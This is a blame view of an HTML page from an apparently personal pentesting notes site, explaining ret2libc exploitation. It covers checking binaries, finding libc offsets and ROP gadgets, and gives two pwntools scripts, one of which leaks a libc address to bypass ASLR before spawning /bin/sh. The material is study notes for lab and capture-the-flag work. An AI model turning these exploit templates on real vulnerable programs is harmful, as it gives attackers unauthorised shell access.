stefan
/
husk
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
husk/build/exploit/binaries/ret2libc.html

338 lines
45 KiB
HTML
Raw Normal View History

init
2022-09-02 09:05:59 +02:00
<!doctype html>
<html lang="en">
<center>
<head>
<script src="https://cdn.jsdelivr.net/npm/fuse.js/dist/fuse.js"></script>
Added settings.toml
2022-09-09 15:41:05 +02:00
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script type="text/javascript" src="/static/js/auto-complete.js"></script>
<script type="text/javascript" src="/static/js/lunr.min.js"></script>
<script type="text/javascript" src="/static/js/search.js"></script>
init
2022-09-02 09:05:59 +02:00
<link rel="stylesheet" href="/static/stylesheet.css">
<link rel="stylesheet" href="/static/auto-complete.css">
<br>
Added settings.toml
2022-09-09 15:41:05 +02:00
<title>The Real Hugo</title>
init
2022-09-02 09:05:59 +02:00
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
<!-- topmenu -->
<div class="menu">
Added settings.toml
2022-09-09 15:41:05 +02:00
<a href="/" style="text-decoration:none">Husk</a>
init
2022-09-02 09:05:59 +02:00
</div>
<div class="search-container">
<label for="search-by"><i class="fas fa-search"></i></label>
<input data-search-input="" id="search-by" type="search" placeholder="Search..." autocomplete="off">
<!--button type="submit"><i class="search"></i>&#128269;</button>-->
<span data-search-clear=""><i class="fas fa-times"></i></span>
</div>
</div>
<div class="menu">
</div>
<!--br><br-->
</center>
<p></p>
<div class="columns">
<!-- Sidebar -->
<div class="column column-1">
Added settings.toml
2022-09-09 15:41:05 +02:00
<ul><details id=enumeration ontoggle="linkClick(this); return false;" ><summary>Enumeration</summary><ul><details id=containers ontoggle="linkClick(this); return false;" ><summary>Containers</summary><ul></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/enumeration/docs/aws.html">aws</a></li><li><a href="/enumeration/docs/cewl.html">cewl</a></li><li><a href="/enumeration/docs/dns.html">dns</a></li><li><a href="/enumeration/docs/docker_enumeration.html">docker_enumeration</a></li><li><a href="/enumeration/docs/ffuf.html">ffuf</a></li><li><a href="/enumeration/docs/gobuster.html">gobuster</a></li><li><a href="/enumeration/docs/kerberoast.html">kerberoast</a></li><li><a href="/enumeration/docs/kubectl.html">kubectl</a></li><li><a href="/enumeration/docs/ldap.html">ldap</a></li><li><a href="/enumeration/docs/linux_basics.html">linux_basics</a></li><li><a href="/enumeration/docs/microk8s.html">microk8s</a></li><li><a href="/enumeration/docs/nfs.html">nfs</a></li><li><a href="/enumeration/docs/nikto.html">nikto</a></li><li><a href="/enumeration/docs/nmap.html">nmap</a></li><li><a href="/enumeration/docs/port_knocking.html">port_knocking</a></li><li><a href="/enumeration/docs/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/docs/rsync.html">rsync</a></li><li><a href="/enumeration/docs/rustscan.html">rustscan</a></li><li><a href="/enumeration/docs/shodan.html">shodan</a></li><details id=snmp ontoggle="linkClick(this); return false;" ><summary>Snmp</summary><ul><li><a href="/enumeration/docs/snmp/onesixtyone.html">onesixtyone</a></li><li><a href="/enumeration/docs/snmp/snmpcheck.html">snmpcheck</a></li></ul></details><li><a href="/enumeration/docs/websites.html">websites</a></li><li><a href="/enumeration/docs/wfuzz.html">wfuzz</a></li><li><a href="/enumeration/docs/wpscan.html">wpscan</a></li></ul></details><details id=network_scanners ontoggle="linkClick(this); return false;" ><summary>Network_scanners</summary><ul></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/enumeration/windows/bloodhound.html">bloodhound</a></li><li><a href="/enumeration/windows/event_log.html">event_log</a></li><li><a href="/enumeration/windows/manual_enum.html">manual_enum</a></li><li><a href="/enumeration/windows/powershell.html">powershell</a></li><li><a href="/enumeration/windows/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/windows/sysinternals.html">sysinternals</a></li><li><a href="/enumeration/windows/sysmon.html">sysmon</a></li><li><a href="/enumeration/windows/vss.html">vss</a></li></ul></details></ul></details><details id=exploit ontoggle="linkClick(this); return false;" ><summary>Exploit</summary><ul><details id=CPUs ontoggle="linkClick(this); return false;" ><summary>CPUs</summary><ul><li><a href="/exploit/CPUs/meltdown.html">meltdown</a></li></ul></details><details id=binaries ontoggle="linkClick(this); return false;" ><summary>Binaries</summary><ul><li><a href="/exploit/binaries/Shellcode.html">Shellcode</a></li><li><a href="/exploit/binaries/aslr.html">aslr</a></li><details id=buffer_overflow ontoggle="linkClick(this); return false;" ><summary>Buffer_overflow</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/exploit/binaries/buffer_overflow/docs/amd64.html">amd64</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/amd64_instructions.html">amd64_instructions</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/buffer_overflow.html">buffer_overflow</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/cut_stack_in_half.html">cut_stack_in_half</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/pwntools_specifics.html">pwntools_specifics</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/ret_address_reuse.html">ret_address_reuse</a></li></ul></details><li><a href="/exploit/binaries/buffer_overflow/ropping.html">ropping</a></li></ul></details><details id=canary_bypass ontoggle="l
init
2022-09-02 09:05:59 +02:00
</ul>
</div>
<div class="column column-2">
<span class="body">
<style>pre { line-height: 125%; }
td.linenos .normal { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
.codehilite .hll { background-color: #2C3B41 }
.codehilite .c { color: #546E7A; font-style: italic } /* Comment */
.codehilite .err { color: #FF5370 } /* Error */
.codehilite .esc { color: #89DDFF } /* Escape */
.codehilite .g { color: #EEFFFF } /* Generic */
.codehilite .k { color: #BB80B3 } /* Keyword */
.codehilite .l { color: #C3E88D } /* Literal */
.codehilite .n { color: #EEFFFF } /* Name */
.codehilite .o { color: #89DDFF } /* Operator */
.codehilite .p { color: #89DDFF } /* Punctuation */
.codehilite .ch { color: #546E7A; font-style: italic } /* Comment.Hashbang */
.codehilite .cm { color: #546E7A; font-style: italic } /* Comment.Multiline */
.codehilite .cp { color: #546E7A; font-style: italic } /* Comment.Preproc */
.codehilite .cpf { color: #546E7A; font-style: italic } /* Comment.PreprocFile */
.codehilite .c1 { color: #546E7A; font-style: italic } /* Comment.Single */
.codehilite .cs { color: #546E7A; font-style: italic } /* Comment.Special */
.codehilite .gd { color: #FF5370 } /* Generic.Deleted */
.codehilite .ge { color: #89DDFF } /* Generic.Emph */
.codehilite .gr { color: #FF5370 } /* Generic.Error */
.codehilite .gh { color: #C3E88D } /* Generic.Heading */
.codehilite .gi { color: #C3E88D } /* Generic.Inserted */
.codehilite .go { color: #546E7A } /* Generic.Output */
.codehilite .gp { color: #FFCB6B } /* Generic.Prompt */
.codehilite .gs { color: #FF5370 } /* Generic.Strong */
.codehilite .gu { color: #89DDFF } /* Generic.Subheading */
.codehilite .gt { color: #FF5370 } /* Generic.Traceback */
.codehilite .kc { color: #89DDFF } /* Keyword.Constant */
.codehilite .kd { color: #BB80B3 } /* Keyword.Declaration */
.codehilite .kn { color: #89DDFF; font-style: italic } /* Keyword.Namespace */
.codehilite .kp { color: #89DDFF } /* Keyword.Pseudo */
.codehilite .kr { color: #BB80B3 } /* Keyword.Reserved */
.codehilite .kt { color: #BB80B3 } /* Keyword.Type */
.codehilite .ld { color: #C3E88D } /* Literal.Date */
.codehilite .m { color: #F78C6C } /* Literal.Number */
.codehilite .s { color: #C3E88D } /* Literal.String */
.codehilite .na { color: #BB80B3 } /* Name.Attribute */
.codehilite .nb { color: #82AAFF } /* Name.Builtin */
.codehilite .nc { color: #FFCB6B } /* Name.Class */
.codehilite .no { color: #EEFFFF } /* Name.Constant */
.codehilite .nd { color: #82AAFF } /* Name.Decorator */
.codehilite .ni { color: #89DDFF } /* Name.Entity */
.codehilite .ne { color: #FFCB6B } /* Name.Exception */
.codehilite .nf { color: #82AAFF } /* Name.Function */
.codehilite .nl { color: #82AAFF } /* Name.Label */
.codehilite .nn { color: #FFCB6B } /* Name.Namespace */
.codehilite .nx { color: #EEFFFF } /* Name.Other */
.codehilite .py { color: #FFCB6B } /* Name.Property */
.codehilite .nt { color: #FF5370 } /* Name.Tag */
.codehilite .nv { color: #89DDFF } /* Name.Variable */
.codehilite .ow { color: #89DDFF; font-style: italic } /* Operator.Word */
.codehilite .w { color: #EEFFFF } /* Text.Whitespace */
.codehilite .mb { color: #F78C6C } /* Literal.Number.Bin */
.codehilite .mf { color: #F78C6C } /* Literal.Number.Float */
.codehilite .mh { color: #F78C6C } /* Literal.Number.Hex */
.codehilite .mi { color: #F78C6C } /* Literal.Number.Integer */
.codehilite .mo { color: #F78C6C } /* Literal.Number.Oct */
.codehilite .sa { color: #BB80B3 } /* Literal.String.Affix */
.codehilite .sb { color: #C3E88D } /* Literal.String.Backtick */
.codehilite .sc { color: #C3E88D } /* Literal.String.Char */
.codehilite .dl { color: #EEFFFF } /* Literal.String.Delimiter */
.codehilite .sd { color: #546E7A; font-style: italic } /* Literal.String.Doc */
.codehilite .s2 { color: #C3E88D } /* Literal.String.Double */
.codehilite .se { color: #EEFFFF } /* Literal.String.Escape */
.codehilite .sh { color: #C3E88D } /* Literal.String.Heredoc */
.codehilite .si { color: #89DDFF } /* Literal.String.Interpol */
.codehilite .sx { color: #C3E88D } /* Literal.String.Other */
.codehilite .sr { color: #89DDFF } /* Literal.String.Regex */
.codehilite .s1 { color: #C3E88D } /* Literal.String.Single */
.codehilite .ss { color: #89DDFF } /* Literal.String.Symbol */
.codehilite .bp { color: #89DDFF } /* Name.Builtin.Pseudo */
.codehilite .fm { color: #82AAFF } /* Name.Function.Magic */
.codehilite .vc { color: #89DDFF } /* Name.Variable.Class */
.codehilite .vg { color: #89DDFF } /* Name.Variable.Global */
.codehilite .vi { color: #89DDFF } /* Name.Variable.Instance */
.codehilite .vm { color: #82AAFF } /* Name.Variable.Magic */
.codehilite .il { color: #F78C6C } /* Literal.Number.Integer.Long */</style>
<div class="column column-3">
<ul>
<li><a href="#ret2libc">Ret2libc</a><ul>
<li><a href="#finding-something-to-execute">Finding something to execute</a></li>
<li><a href="#libc-finding-offsets">libc -- Finding Offsets</a><ul>
<li><a href="#manually">Manually</a></li>
<li><a href="#measure-the-buffer">Measure the Buffer</a></li>
</ul>
</li>
<li><a href="#rop-creating-a-chain">ROP -- Creating a Chain</a><ul>
<li><a href="#manually_1">Manually</a></li>
</ul>
</li>
<li><a href="#automated">Automated</a></li>
<li><a href="#example-without-aslr">Example without ASLR</a></li>
<li><a href="#example-with-aslr">Example with ASLR</a></li>
</ul>
</li>
</ul>
</div>
<h1 id="ret2libc">Ret2libc</h1>
<ul>
<li>
<p><a href="https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/ret2libc">ir0nstone ret2libc</a></p>
</li>
<li>
<p>Check binary via</p>
<ul>
<li><code>checksec</code>, PIE shows start address, RELRO shows permissions of r/w to got</li>
<li><code>file</code></li>
</ul>
</li>
<li>Libc is affected by ASLR state of the machine, check via <code>cat /proc/sys/kernel/randomize_va_space</code><ul>
<li>Off = 0</li>
<li>Partial = 1</li>
<li>Full = 2</li>
</ul>
</li>
<li><code>got</code> contains dynamically loaded functions</li>
<li><code>plt</code> contains used loaded dynamical functions</li>
</ul>
<h2 id="finding-something-to-execute">Finding something to execute</h2>
<ul>
<li>Interesting stuff to call from inside libc<ul>
<li><code>/bin/sh</code></li>
<li><code>system</code></li>
</ul>
</li>
</ul>
<h2 id="libc-finding-offsets">libc -- Finding Offsets</h2>
<ul>
<li>Find libc address at runtime via gbd</li>
</ul>
<div class="codehilite"><pre><span></span><code>info sharedlibrary
</code></pre></div>
<h3 id="manually">Manually</h3>
<ul>
<li>On target find <code>sh</code> address inside libc</li>
</ul>
<div class="codehilite"><pre><span></span><code>strings -a -t x /lib32/libc.so.6 <span class="p">|</span> grep /bin/sh
</code></pre></div>
<ul>
<li>Sub from <code>system</code> address from inside libc</li>
</ul>
<div class="codehilite"><pre><span></span><code>readelf -s /lib32/libc.so.6 <span class="p">|</span> grep system
</code></pre></div>
<h3 id="measure-the-buffer">Measure the Buffer</h3>
<ul>
<li>With gef<ul>
<li><code>pattern create</code></li>
<li><code>run</code></li>
<li>Use pattern</li>
<li><code>pattern search $&lt;register&gt;</code></li>
</ul>
</li>
</ul>
<h2 id="rop-creating-a-chain">ROP -- Creating a Chain</h2>
<ul>
<li>Creating a ROP chain to execute the <code>/bin/sh</code> with parameters</li>
<li>Check<ul>
<li>Architecture</li>
<li>Calling convention</li>
</ul>
</li>
</ul>
<h3 id="manually_1">Manually</h3>
<div class="codehilite"><pre><span></span><code>ROPgadget --binary &lt;file&gt; <span class="p">|</span> grep rdi
</code></pre></div>
<ul>
<li>Find <code>ret</code>s, to put in front of rdi</li>
</ul>
<div class="codehilite"><pre><span></span><code>objdump -d &lt;file&gt; <span class="p">|</span> grep ret
</code></pre></div>
<h2 id="automated">Automated</h2>
<ul>
<li><a href="https://github.com/xct/ropstar.git">xct's ropstar</a></li>
</ul>
<h2 id="example-without-aslr">Example without ASLR</h2>
<div class="codehilite"><pre><span></span><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">p</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s1">&#39;&lt;binary&gt;&#39;</span><span class="p">)</span>
<span class="n">cbase</span> <span class="o">=</span> <span class="mi">0</span><span class="n">x</span><span class="o">&lt;</span><span class="n">libc_base</span><span class="o">&gt;</span>
<span class="n">sys</span> <span class="o">=</span> <span class="n">cbase</span> <span class="o">+</span> <span class="o">&lt;</span><span class="n">libc_system</span><span class="o">&gt;</span>
<span class="n">sh</span> <span class="o">=</span> <span class="n">cbase</span> <span class="o">+</span> <span class="o">&lt;</span><span class="n">libc_shell</span><span class="o">&gt;</span>
<span class="n">rop_rdi</span> <span class="o">=</span> <span class="o">&lt;</span><span class="n">found</span> <span class="n">rop</span> <span class="n">rdi</span><span class="o">&gt;</span>
<span class="n">rop_ret</span> <span class="o">=</span> <span class="o">&lt;</span><span class="n">found</span> <span class="n">rop</span> <span class="n">ret</span><span class="o">&gt;</span>
<span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span> <span class="o">*</span> <span class="o">&lt;</span><span class="n">count</span><span class="o">&gt;</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="sa">b</span><span class="s1">&#39;B&#39;</span> <span class="o">*</span> <span class="mi">8</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">rop_ret</span><span class="p">)</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">rop_rdi</span><span class="p">)</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">sh</span><span class="p">)</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">system</span><span class="p">)</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x0</span><span class="p">)</span> <span class="c1"># end payload</span>
<span class="n">p</span><span class="o">.</span><span class="n">recv</span><span class="p">()</span>
<span class="n">p</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
<span class="n">p</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span>
</code></pre></div>
<h2 id="example-with-aslr">Example with ASLR</h2>
<ul>
<li>Create context</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="ch">#!/usr/bin/env python3</span>
<span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">context</span><span class="o">.</span><span class="n">binary</span> <span class="o">=</span> <span class="n">binary</span> <span class="o">=</span> <span class="s1">&#39;&lt;binary&gt;&#39;</span>
<span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="n">binary</span><span class="p">)</span>
<span class="n">rop</span> <span class="o">=</span> <span class="n">ROP</span><span class="p">(</span><span class="n">elf</span><span class="p">)</span>
<span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s1">&#39;/lib/x86_64-linux-gnu/libc.so.6&#39;</span><span class="p">)</span>
<span class="n">p</span> <span class="o">=</span> <span class="n">process</span><span class="p">()</span>
<span class="c1"># ROP I, needed when ASL is enabled</span>
<span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span> <span class="o">*</span> <span class="mi">18</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">rop</span><span class="o">.</span><span class="n">find_gadget</span><span class="p">([</span><span class="s1">&#39;pop rdi&#39;</span><span class="p">,</span> <span class="s1">&#39;ret&#39;</span><span class="p">])[</span><span class="mi">0</span><span class="p">])</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">elf</span><span class="o">.</span><span class="n">got</span><span class="o">.</span><span class="n">gets</span><span class="p">)</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">elf</span><span class="o">.</span><span class="n">plt</span><span class="o">.</span><span class="n">puts</span><span class="p">)</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">elf</span><span class="o">.</span><span class="n">symbols</span><span class="o">.</span><span class="n">main</span><span class="p">)</span>
<span class="n">p</span><span class="o">.</span><span class="n">recvline</span><span class="p">()</span>
<span class="n">p</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
<span class="n">p</span><span class="o">.</span><span class="n">recvline</span><span class="p">()</span>
<span class="n">leak</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">p</span><span class="o">.</span><span class="n">recvline</span><span class="p">()</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span><span class="sa">b</span><span class="s1">&#39;</span><span class="se">\0</span><span class="s1">&#39;</span><span class="p">))</span> <span class="c1"># ljust, pre padding for alignement</span>
<span class="n">p</span><span class="o">.</span><span class="n">recvline</span><span class="p">()</span>
<span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="sa">f</span><span class="s2">&quot;gets: </span><span class="si">{</span><span class="nb">hex</span><span class="p">(</span><span class="n">leak</span><span class="p">)</span><span class="si">}</span><span class="s2">&quot;</span><span class="p">)</span>
<span class="n">libc</span><span class="o">.</span><span class="n">address</span> <span class="o">=</span> <span class="n">leak</span> <span class="o">-</span> <span class="n">libc</span><span class="o">.</span><span class="n">symbols</span><span class="o">.</span><span class="n">gets</span>
<span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="sa">f</span><span class="s2">&quot;libc address: </span><span class="si">{</span><span class="nb">hex</span><span class="p">(</span><span class="n">libc</span><span class="o">.</span><span class="n">address</span><span class="p">)</span><span class="si">}</span><span class="s2">&quot;</span><span class="p">)</span> <span class="c1"># start address should be aligned</span>
<span class="c1"># ROP II</span>
<span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span> <span class="o">*</span> <span class="mi">18</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">rop</span><span class="o">.</span><span class="n">find_gadget</span><span class="p">([</span><span class="s1">&#39;pop rdi&#39;</span><span class="p">,</span> <span class="s1">&#39;ret&#39;</span><span class="p">])[</span><span class="mi">0</span><span class="p">])</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="nb">next</span><span class="p">(</span><span class="n">libc</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;/bin/sh&#39;</span><span class="p">)))</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">rop</span><span class="o">.</span><span class="n">find_gadget</span><span class="p">([</span><span class="s1">&#39;ret&#39;</span><span class="p">])[</span><span class="mi">0</span><span class="p">])</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">libc</span><span class="o">.</span><span class="n">symbols</span><span class="o">.</span><span class="n">system</span><span class="p">)</span>
<span class="n">p</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
<span class="n">p</span><span class="o">.</span><span class="n">recvline</span><span class="p">()</span>
<span class="n">p</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span>
</code></pre></div>
</span>
</div>
</div>
<div id="footer">
<p></p>
<center>
&copy; Stefan Friese
</center>
</div>
<script>
Added settings.toml
2022-09-09 15:41:05 +02:00
function linkClick(obj) {
init
2022-09-02 09:05:59 +02:00
if (obj.open) {
Added settings.toml
2022-09-09 15:41:05 +02:00
//console.log('open');
init
2022-09-02 09:05:59 +02:00
if (sessionStorage.getItem(obj.id) && !(sessionStorage.getItem(obj.id) === "open")) {
sessionStorage.removeItem(obj.id);
}
Added settings.toml
2022-09-09 15:41:05 +02:00
sessionStorage.setItem(obj.id,"open");
console.log(obj.id);
init
2022-09-02 09:05:59 +02:00
} else {
Added settings.toml
2022-09-09 15:41:05 +02:00
//console.log('closed');
sessionStorage.removeItem(obj.id);
}
}
init
2022-09-02 09:05:59 +02:00
Added settings.toml
2022-09-09 15:41:05 +02:00
let _keys = Object.keys(sessionStorage);
if (_keys) {
for ( let i = 0; i < _keys.length; i++ ) {
document.getElementById(_keys[i])['open'] = 'open';
}
}
init
2022-09-02 09:05:59 +02:00
</script>
Added settings.toml
2022-09-09 15:41:05 +02:00
<script async src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script>
init
2022-09-02 09:05:59 +02:00
<script type="text/x-mathjax-config">
Added settings.toml
2022-09-09 15:41:05 +02:00
MathJax.Hub.Config({
config: ["MMLorHTML.js"],
jax: ["input/TeX", "output/HTML-CSS", "output/NativeMML"],
extensions: ["MathMenu.js", "MathZoom.js"]
});
</script>
init
2022-09-02 09:05:59 +02:00
</body>
</html>